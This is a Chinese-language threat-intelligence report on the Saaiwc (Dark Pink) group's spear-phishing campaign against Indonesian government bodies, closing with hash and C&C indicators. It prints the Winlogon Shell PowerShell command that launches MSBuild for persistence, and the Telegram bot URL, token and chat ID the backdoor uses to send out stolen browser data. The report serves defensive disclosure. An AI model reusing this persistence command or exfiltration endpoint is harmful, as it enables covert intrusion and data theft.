Saaiwc组织针对印尼政府的攻击活动分析
近期,360高级威胁研究院在日常威胁狩猎中发现Saaiwc组织针对印度尼西亚外交部等政府部门的多个网络攻击活动。在本轮攻击活动中,该组织利用磁盘映像文件作为恶意载体,诱导执行后解密释放MSBuild Project文件,随后利用计划任务触发winlogon注册表以启动MSBuild.exe工具生成并加载恶意载荷,从而完成窃密行动。
一、攻击活动分析
1.攻击流程分析
Saaiwc组织常以ISO磁盘映像文件格式作为攻击载荷,本次捕获的攻击样本也不例外,采用的是ISO格式,解压后都包含伪装文档、正常程序以及需要侧加载的恶意DLL,并且均由印度尼西亚所在地区上传。结合该组织经常使用鱼叉式网络钓鱼攻击手法,推断本次攻击应该也是使用鱼叉钓鱼投递方式。
该组织近期攻击流程大致如下所示:
攻击者首先利用磁盘映象文件作为攻击载体,当受害者打开恶意ISO文件后,点击执行伪装成DOC文档的可执行程序,该程序实为Winword.exe白程序,执行时侧加载同目录下的MSVCR100.DLL,该恶意DLL首先从诱饵文件中解密释放出MSBuild project文件,随后打开原始诱饵文件,接着在注册表winlogon项新建值,当系统重新登录时执行MSBuild.exe加载project文件操作,从而开启窃密行动,最后创建计划任务定时注销电脑,以此实现驻留。
2.载荷基本信息
本次捕获的ISO样本基本信息如下所示:
MD5 | 文件名 |
836184b7387b212f8b7f064d5e60f587 | Concept paper Strategic Dialogue DEU-IDN.zip.iso |
0f50af41edb7e3456cba4dd05b805da1 | 230131 brafaks ttd dir pro PTRI ASEAN undangan narasumber perwakins norwegia.iso |
1ee99e4eb1a855186812204a1e3b72de | CONCEPT NOTE - A SUSTAINABLE FORUM - BUILDING THE RESEARCH CAPACITY OF THE EAMF 16 DEC 2022.iso |
这些诱饵文档主题均涉及印尼,再结合样本是由印尼所在地区上传,因此Saaiwc组织在本轮攻击中使用的样本主要针对印尼。
3.载荷投递分析
本轮捕获的针对印尼攻击样本流程基本一致,下面就其中一个样本(MD5:0f50af41edb7e3456cba4dd05b805da1)进行详细分析,该文件为ISO类型,文件名使用印尼语进行伪装。
当点击ISO文件时,可看到伪装成word图标文档的应用程序,以便用户运行,该程序实为正常文件winword.exe,运行后会侧加载同目录下的MSVCR100.dll,该DLL被隐藏,同时还有一个隐藏的DOC文件。隐藏文件夹不显示,打开如下图所示:
取消隐藏后打开就能看到恶意程序。
侧加载的恶意DLL文件信息如下:
文件名称 | MSVCR100.dll |
文件大小 | 41.00 KB (41984字节) |
MD5 | c431ddc7ed614effd8e2ae816107de3f |
编译时间 | 2022-12-22 00:12:05 |
读取该文件对其进行异或0xCA解密,将其中的xml文件保存到%TEMP%//wct1FDA.tmp,解密出的xml文件部分内容如下所示:
接着创建winword.exe进程打开诱饵文件。
随后获取MSBuildToolsPath工具路径,并打开“Environment”注册表项创建新值。
新建的字符串值MS、PSS和TMPT的数据如下所示。
然后打开注册表"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\",并新建字符串值Shell项。
Shell项具体数据如下:
explorer.exe, %PSS% -nop -w h \"Start-Process -N -F $env:MS -A $env:TMPT\ |
将环境变量值进行替换,得到该实际数据。
explorer.exe, powershell -nop -w h \"Start-Process -N -F C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe -A C:\\Users\\***\\AppData\\Local\\Temp\\wct1FDA.tmp\" |
该项主要是通过powershell启动MSBild.exe运行解密出的project xml文件。
最后创建名为“Health Check”的计划任务,在每周三、周五的13:15分启动,其操作为注销电脑,从而触发注册表winlogon项,以此实现驻留。
4.攻击组件分析
通过定时任务启动的MSBuild Project文件(wct1FDA.tmp)信息如下:
文件名称 | wct1FDA.tmp |
文件大小 | 490.00 KB (501832字节) |
MD5 | 9bdb78cc2978bffbaea2ca38da5bcae7 |
该文件先对base64数据异或解密,接着解压缩得到后门文件,然后传入参数内存加载后门文件并执行其中的PRLiSNFR方法。
后门文件信息如下所示:
文件名称 | svchost.dll |
文件大小 | 1.06 MB (1121280字节) |
MD5 | 924ead4a5d65e3ca7a327d8be38bb725 |
编译时间 | 2022-12-22 17:12:15 |
Execute函数配置APIKEY,CHATID,计算机名以及Telegram通信域名的值,可以看到代码被严重混淆,每次都需要FixedUpdate函数进行解密,并且该函数将当前栈帧函数名作为解密配置。
随后启动RUN函数,首先判断“%LOCALAPPDATA%\\desktop.ini.dat”文件是否存在,若不存在,则创建该文件写入数据“AGNxhJvQ4LoxKD_:0”作为感染标志,然后设置文件属性为隐藏模式。
并且发起初次请求,请求地址为api.telegram.org/bot5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ/sendMessage,其数据为{chat_id:5556823494,text:"{whoami}:\n {command}:\n\n{whoami} first time come",parse_mode:html},上线url的指令command为空,若非初次上线,并且存在desktop.ini.dat文件时,“first time come”则改变为“come back”。
接着获取Chrome 、Edge和FireFox浏览器的数据并加密后采用post的方式上传到"api.telegram.org/bot5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ/sendDocument?chat_id=5556823494?caption={whoami} "。
完成上传后就一直等待服务端返回数据并解析指令执行相应操作,指令信息如下表格所示。
指令 | 描述 |
SHOWUP | 执行上线 |
GETBRWS | 窃取浏览器数据并上传 |
TOKENNEW | 更新Telegram通信的APIKEY和CHATID |
XMLNEW | 更新xml文件 |
二、归属研判
通过详细分析样本,发现本次攻击样本和Saaiwc组织前期攻击组件存在很高的相似度。
1) 本次攻击整体流程相似,攻击载体均使用ISO文件,并且都是利用白文件加载恶意DLL,进而完成窃密行为;
2) 攻击者均使用APIKEY和CHATID与Telegram-API接口通信,并且通信格式也存在相似度;
3) 最终攻击组件代码逻辑与俄罗斯网络安全公司Group-IB发表文章(https://www.group-ib.com/blog/dark-pink-apt/)提到的KamiKakaBot组件相似度很高,只是本次采用.NET版本,并且关键信息、字符串都进行了加密混淆处理,提高了分析难度。
4) 本次捕获的攻击样本主要针对印尼相关政府机构,该目标符合该组织的定向攻击方向。
综上,将本轮攻击行动归属到Saaiwc组织。
Saaiwc组织自被披露以来,针对东南亚国家的攻击行动一直处于活跃之中,并且有愈演愈烈的趋势。在本轮针对印度尼西亚政府的攻击行动中,该组织仍以ISO文件作为恶意载体,采用了系统登录启动项来执行msbulid.exe从而完成对恶意载荷的加载,并且最终恶意载荷使用了较为复杂的混淆方式,这都表明该组织仍在不断丰富自己的攻击手段和积极探索新的攻击技术。最终载荷支持更新配置文件说明该组织的攻击代码已呈现出模块化的特点,后续可能开发出新的攻击武器,我们也将持续关注该组织针对东南亚及其他地区的攻击武器。
MD5:
0f50af41edb7e3456cba4dd05b805da1
836184b7387b212f8b7f064d5e60f587
1ee99e4eb1a855186812204a1e3b72de
30f8c62e7736947fbd352b328f8bfbb5
c431ddc7ed614effd8e2ae816107de3f
9bdb78cc2978bffbaea2ca38da5bcae7
924ead4a5d65e3ca7a327d8be38bb725
315d7eb085ee8f0a0d81c81916895f5d
ee0642a6b59328c4dd91f18ef5026722
f1ff57100f578a3c6acb754b6688cc30
1c5f620b388d47aea55b829c28d95958
C&C:
https://api.telegram.org/bot5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ/sendDocument?chat_id=5556823494
https://www.group-ib.com/blog/dark-pink-apt/
360高级威胁研究院